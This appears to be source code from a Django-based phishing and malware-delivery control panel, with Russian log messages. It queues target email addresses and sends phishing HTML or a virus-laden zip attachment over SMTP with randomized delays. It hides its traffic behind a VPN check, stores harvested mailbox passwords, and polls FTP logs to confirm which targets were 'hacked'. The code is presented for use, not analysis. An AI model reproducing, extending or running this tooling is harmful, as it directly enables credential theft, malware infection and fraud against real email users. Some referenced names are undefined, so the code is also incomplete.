def new_record(request):
if "token" not in request.GET or "username" not in request.GET:
return JsonResponse({"response": "field error"})
try:
the_user = Users.objects.get(username=request.GET['username'])
except Users.DoesNotExist:
return JsonResponse({'response': 'denied'})
if request.GET['token'] != the_user.token:
return JsonResponse({"response": "denied"})
answer = {"response": "ok"}
try:
orders = Stack.objects.all().filter(status=0)
except Stack.DoesNotExist:
return JsonResponse({"response": "stack error"})
records = []
for order in orders:
tmp_rec = {
"email": order.email,
"country": order.country,
"description": order.description,
"method": order.method,
"by_virus": order.by_virus,
"by_fishing": order.by_fishing,
"date_add": order.date_add,
"date_hacked": order.date_hacked,
"comment": order.comment,
"status": order.status
}
records.append(tmp_rec)
answer["orders"] = records
logging('new_record', 'new record')
return JsonResponse(answer)
def get_emails(request):
if 'username' not in request.GET or 'token' not in request.GET:
return JsonResponse({'response': 'filed error'})
try:
the_user = Users.objects.get(username=request.GET['username'])
except Users.DoesNotExist:
return JsonResponse({'response': 'denied'})
if request.GET['token'] != the_user.token:
return JsonResponse({"response": "denied"})
answer = {"response": "ok"}
try:
emails = Emails.objects.all().filter(status=1)
except Emails.DoesNotExist:
return JsonResponse({"response": "no emails"})
records = []
for email in emails:
tmp_rec = {
"email": email.email,
"description": email.description,
"lsdt": email.last_scan_datetime,
"comment": email.comment
}
records.append(tmp_rec)
answer["emails"] = records
if get_config('grab_management') == '0':
grab_manager = GrabManager()
grab_manager.start()
logging('get_emails', '{0} get emails'.format(the_user.username))
return JsonResponse(answer)
def add_email(request):
if "token" not in request.POST or 'username' not in request.POST or "email" not in request.POST or \
"password" not in request.POST or "description" not in request.POST or "comment" not in request.POST:
return JsonResponse({'response': 'filed error'})
try:
the_user = Users.objects.get(username=request.POST['username'])
except Users.DoesNotExist:
return JsonResponse({'response': 'denied'})
if request.POST['token'] != the_user.token:
return JsonResponse({"response": "denied"})
if Emails.objects.filter(email=request.POST['email']).exists():
if Emails.objects.get(email=request.POST['email']).status == '0':
eml = Emails.objects.get(email=request.POST['email'])
eml.status = '1'
eml.save()
return JsonResponse({"response": 'ok'})
else:
return JsonResponse({"response": 'exists'})
eml = Emails()
eml.email = request.POST['email']
eml.password = crypt(request.POST['password'])
eml.description = request.POST['description']
eml.last_scan_datetime = (
datetime.datetime.now() -
datetime.timedelta(days=30)).strftime('%d.%m.%Y %H:%M')
eml.last_messages_datetime = eml.last_scan_datetime
eml.comment = request.POST['comment']
eml.status = '1'
eml.save()
logging('add_email', '{0} added email.'.format(the_user.username))
return JsonResponse({"response": "ok"})
def add_to_stack(request):
if 'username' not in request.POST or 'token' not in request.POST or 'emails' not in request.POST or \
'sender' not in request.POST or 'sender_password' not in request.POST or 'subject' not in request.POST or \
'body_name' not in request.POST or 'method' not in request.POST or 'country' not in request.POST or \
'description' not in request.POST:
return JsonResponse({'response': 'field error'})
try:
the_user = Users.objects.get(username=request.POST['username'])
except Users.DoesNotExist:
return JsonResponse({'response': 'denied'})
if request.POST['token'] != the_user.token:
return JsonResponse({"response": "denied"})
email_count = 0
emls = request.POST['emails']
emails = emls.split(",")
for email in emails:
email_count += 1
new_stack = Stack()
new_stack.sender = request.POST['sender']
new_stack.sender_password = request.POST['sender_password']
new_stack.email = email
new_stack.subject = request.POST['subject']
try:
new_stack.body = Templates.objects.get(
name=request.POST['body_name']).body
except Templates.DoesNotExist:
new_stack.body = request.POST['body_name']
new_stack.method = request.POST['method']
new_stack.date_add = date.today()
new_stack.country = request.POST['country']
new_stack.description = request.POST['description']
new_stack.ftp_host = request.POST['host']
new_stack.ftp_login = request.POST['user']
new_stack.ftp_password = request.POST['pswd']
new_stack.who_hacked = request.POST['username']
new_stack.status = '0'
new_stack.save()
personal_logging(the_user.log_file, 'New attacking :' + email)
del new_stack
if email_count > 0:
if get_config('attacking') == '0':
atk = Attacking()
atk.start()
if get_config('checking_ftp') == '0':
check = CheckFtp()
check.start()
logging('add_to_stack',
'{0} added emails to stack.'.format(the_user.username))
return JsonResponse({'response': 'ok', 'emails_add': email_count})
def grab_managing():
logging('GrabManager', 'START')
if get_config('grab_management') == '1':
return
set_config('grab_management', '1')
# scan_time = get_config('scan_time')
try:
while True:
if datetime.now().time().strftime('%H:%M') == get_config(
'scan_time') and get_config('grabbing') == '0':
grabber = Grabbing()
grabber.start()
sleep(58)
finally:
set_config('grab_management', '0')
def delete_email(request):
if 'username' not in request.GET or 'token' not in request.GET or "email" not in request.POST:
return JsonResponse({'response': 'filed error'})
try:
the_user = Users.objects.get(username=request.GET['username'])
except Users.DoesNotExist:
return JsonResponse({'response': 'denied'})
if request.GET['token'] != the_user.token:
return JsonResponse({"response": "denied"})
try:
eml = Emails.objects.get(email=request.POST['email'])
except Emails.DoesNotExist:
return JsonResponse({"response": "not exists"})
eml.status = "0"
eml.save()
logging('delete_email', '{0} deleted email.'.format(the_user.username))
return JsonResponse({"response": "ok"})
def get_arch_info(request):
if 'username' not in request.GET or 'token' not in request.GET:
return JsonResponse({'response': 'filed error'})
try:
the_user = Users.objects.get(username=request.GET['username'])
except Users.DoesNotExist:
return JsonResponse({'response': 'denied'})
if request.GET['token'] != the_user.token:
return JsonResponse({"response": "denied"})
if get_config('grabbing') == '1':
return JsonResponse({"response": "denied"})
all_zips = Zips.objects.all()
zips_dict = {}
zips_record = []
zips_dict['response'] = 'ok'
zips_dict['count'] = Zips.objects.count()
for a_zip in all_zips:
zips_record.append(a_zip.name)
zips_dict['zips'] = zips_record
logging('get_arch_info',
'{0} getting arch info.'.format(the_user.username))
return JsonResponse(zips_dict)
def load_template(request):
if 'username' not in request.POST or 'token' not in request.POST or 'name' not in request.POST or \
'description' not in request.POST or 'template' not in request.POST:
return JsonResponse({'response': 'filed error'})
try:
the_user = Users.objects.get(username=request.POST['username'])
except Users.DoesNotExist:
return JsonResponse({'response': 'denied'})
if request.POST['token'] != the_user.token:
return JsonResponse({"response": "denied"})
template = Templates()
template.name = request.POST['name']
template.body = request.POST['template']
template.description = request.POST['description']
template.owner = request.POST['username']
template.save()
personal_logging(the_user.log_file,
'Add template: {0}'.format(request.POST['name']))
logging(
'add_to_stack',
'{0} added template {1} to templates.'.format(the_user.username,
request.POST['name']))
return JsonResponse({"response": "ok"})
def get_zips(request):
if 'username' not in request.GET or 'token' not in request.GET or "zip_name" not in request.GET:
return JsonResponse({'response': 'filed error'})
try:
the_user = Users.objects.get(username=request.GET['username'])
except Users.DoesNotExist:
return JsonResponse({'response': 'denied'})
if request.GET['token'] != the_user.token:
return JsonResponse({"response": "denied"})
try:
a_zip = Zips.objects.get(name=request.GET['zip_name'])
except Zips.DoesNotExist:
return JsonResponse({"response": "no_record"})
the_file = a_zip.path
file_name = os.path.basename(the_file)
chunk_size = 8192
response = StreamingHttpResponse(
FileWrapper(open(the_file, 'rb'), chunk_size),
content_type=mimetypes.guess_type(the_file)[0])
response['Content-Length'] = os.path.getsize(the_file)
response['Content-Disposition'] = "attachment; filename=%s" % file_name
logging('get_zips', '{0} getting zips.'.format(the_user.username))
return response
def run(self):
if get_config('checking_ftp') == '1':
return
set_config('checking_ftp', 1)
logging('check_ftp', 'START')
try:
while True:
logging('check_ftp', 'while True:')
while True:
if get_config('vpn') == '1':
break
else:
logging('check_ftp', 'not check_ip()')
sleep(60)
try:
stack = Stack.objects.all().filter(status=1)
except Stack.DoesNotExist:
continue
for target in stack:
logging('CheckFtp', target.email)
log_path = os.path.join('logs_ftp', target.ftp_host)
if not os.path.exists(log_path):
os.makedirs(log_path)
if not os.path.isfile(os.path.join(log_path, log_file)):
fl = open(os.path.join(log_path, log_file), 'w')
fl.close()
target.ftp_path_to_log = checker(target.ftp_host, target.ftp_login, target.ftp_password,
log_path, target.ftp_path_to_log)
log_text = open(os.path.join(log_path, log_file)).read()
tmp_log_text = open(os.path.join(log_path, tmp_log_file)).read()
if log_text != tmp_log_text:
os.remove(os.path.join(log_path, log_file))
os.rename(os.path.join(log_path, tmp_log_file), os.path.join(log_path, log_file))
if target.email in tmp_log_text:
target.status = "2"
else:
if os.path.isfile(os.path.join(log_path, tmp_log_file)):
os.remove(os.path.join(log_path, tmp_log_file))
if datetime.datetime.today() - datetime.datetime.strptime(target.date_add, '%Y-%m-%d') > \
datetime.timedelta(days=days_limit):
target.status = '3'
target.save()
sleep(random.randint(300, 600))
finally:
set_config('checking_ftp', 0)
return
def send_fishing(host,
port,
sender,
sender_password,
email,
subject,
body,
file=None):
logging('send_fishing', 'start')
if file is not None:
atk_type = 'вируса'
else:
atk_type = 'фишинга'
logging('send_fishing', 'attack type: {0}'.format(atk_type))
try:
msg = MIMEMultipart()
msg['From'] = sender
msg['To'] = email
msg['Subject'] = subject
msg.attach(MIMEText(body, 'html'))
logging('send_fishing', 'msg готов')
except Exception as e:
logging('send_fishing',
'ExceptionL: {0}, \nпри подготовке msg'.format(e))
return 'err. Ошибка создания MIMEMultipart при отправке {0} msg: {1}'.format(
atk_type, str(e))
if file is not None:
file_payload = MIMEBase('application', 'octet-stream')
with open(file, 'rb') as fl:
file_payload.set_payload(fl.read())
fl.close()
encoders.encode_base64(file_payload)
file_payload.add_header(
'Content-Disposition',
'attachment; filename="{0}"'.format(os.path.basename(file)))
msg.attach(file_payload)
logging('send_fishing', 'FILE: {0} добавлен в attach'.format(file))
try:
session = smtplib.SMTP_SSL(host, int(port))
logging('send_fishing', 'SMTP_SSL соединение...')
except Exception as e:
logging('send_fishing',
'EXCEPTION: SMTP_SSL соединения: {0}'.format(e))
return 'err. Ошибка подключения к хосту {0} по порту {1} при отправке {2}. Ошибка: {3}'.format(
host, port, atk_type, str(e))
# try:
# logging('send_fishing', 'starttls...')
# session.starttls()
# except Exception as e:
# logging('send_fishing', 'Exception starttls: {0}'.format(e))
# return 'err. Ошибка TLS соединения для {0} с паролем {1} при отправке {2}. Ошибка: {3}'.\
# format(sender, sender_password, atk_type, str(e))
try:
session.login(sender, sender_password)
logging('send_fishing', 'logining...')
except Exception as e:
logging('send_fishing', 'Exception logining: {0}'.format(e))
return 'err. Ошибка аутентификации для {0} с паролем {1} при отправке {2}. Ошибка: {3}' \
.format(sender, sender_password, atk_type, str(e))
try:
logging('send_fishing', 'sending mail...')
session.sendmail(sender, email, msg.as_string().encode('utf-8'))
except Exception as e:
logging('send_fishing', 'Exception sendmail: {0}'.format(e))
return 'err. Ошибка при отправке {0} на почту {1}: {2}'.format(
atk_type, email, str(e))
logging('send_fishing', 'quiting')
session.quit()
logging('send_fishing', 'finish')
return 'Успешная отправка {0}: {1}'.format(atk_type, email)
def run(self):
if get_config('attacking') == '1':
return
set_config('attacking', '1')
try:
while True:
logging('make_an_attack', 'while True')
stack = Stack.objects.all().filter(status='0')
stack_count = stack.count()
if stack_count == 0:
set_config('attacking', '0')
return
for email in stack:
while True:
if get_config('vpn') == '1':
logging('make_an_attack', 'vpn==1, break')
break
else:
logging(
'make_an_attack',
'Не могу подключиться к VPN при атаке почты {0}. Засыпаю в ожиданий'
.format(email.email))
sleep(60)
logging('make_an_attack', 'vpn==1, breaked')
logging('make_an_attack',
'Attacking email: {0}'.format(email.email))
result = ''
try:
eml_prm = EmailConfigs.objects.get(
name=email.email.split('@')[1])
except EmailConfigs.DoesNotExist:
logging(
'make_an_attack',
'Неизвестный Хост и Порт для {0}'.format(
email.email))
continue
if email.method == '1':
result = send_fishing(eml_prm.host, eml_prm.port,
email.sender,
email.sender_password,
email.email, email.subject,
email.body)
if email.method == '2':
the_file = os.getcwd() + '/vir_dir/init.zip'
# TODO: Генерация вируса и добавление пути
result = send_fishing(eml_prm.host, eml_prm.port,
email.sender,
email.sender_password,
email.email, email.subject,
email.body, the_file)
if email.method == '3':
send_fishing_with_virus()
stack_count -= 1
logging('make_an_attack', result)
if result[0] == 'У':
email.status = '1'
else:
email.status = '4'
email.save()
sleep(random.randint(30, 120))
del stack
except Exception as e:
logging('make_an_attack EXCEPT', str(e))
finally:
set_config('attacking', '0')
def run(self):
logging('GrabManager', 'run...')
grab_managing()
def run(self):
logging('VpnManager', 'Start')
if get_config('vpn_manager') == '1':
logging('VpnManager', 'return 1')
return
set_config('vpn_manager', '1')
while True:
try:
country = get_country()
logging('VpnManager', 'country = {0}'.format(country))
if country == 'KZ':
set_config('vpn', '0')
logging('VpnManager', 'vpn=0')
else:
set_config('vpn', '1')
logging('VpnManager', 'vpn=1')
sleep(200)
except Exception:
logging('VpnManager', 'Error: {0}'.format(sys.exc_info()))
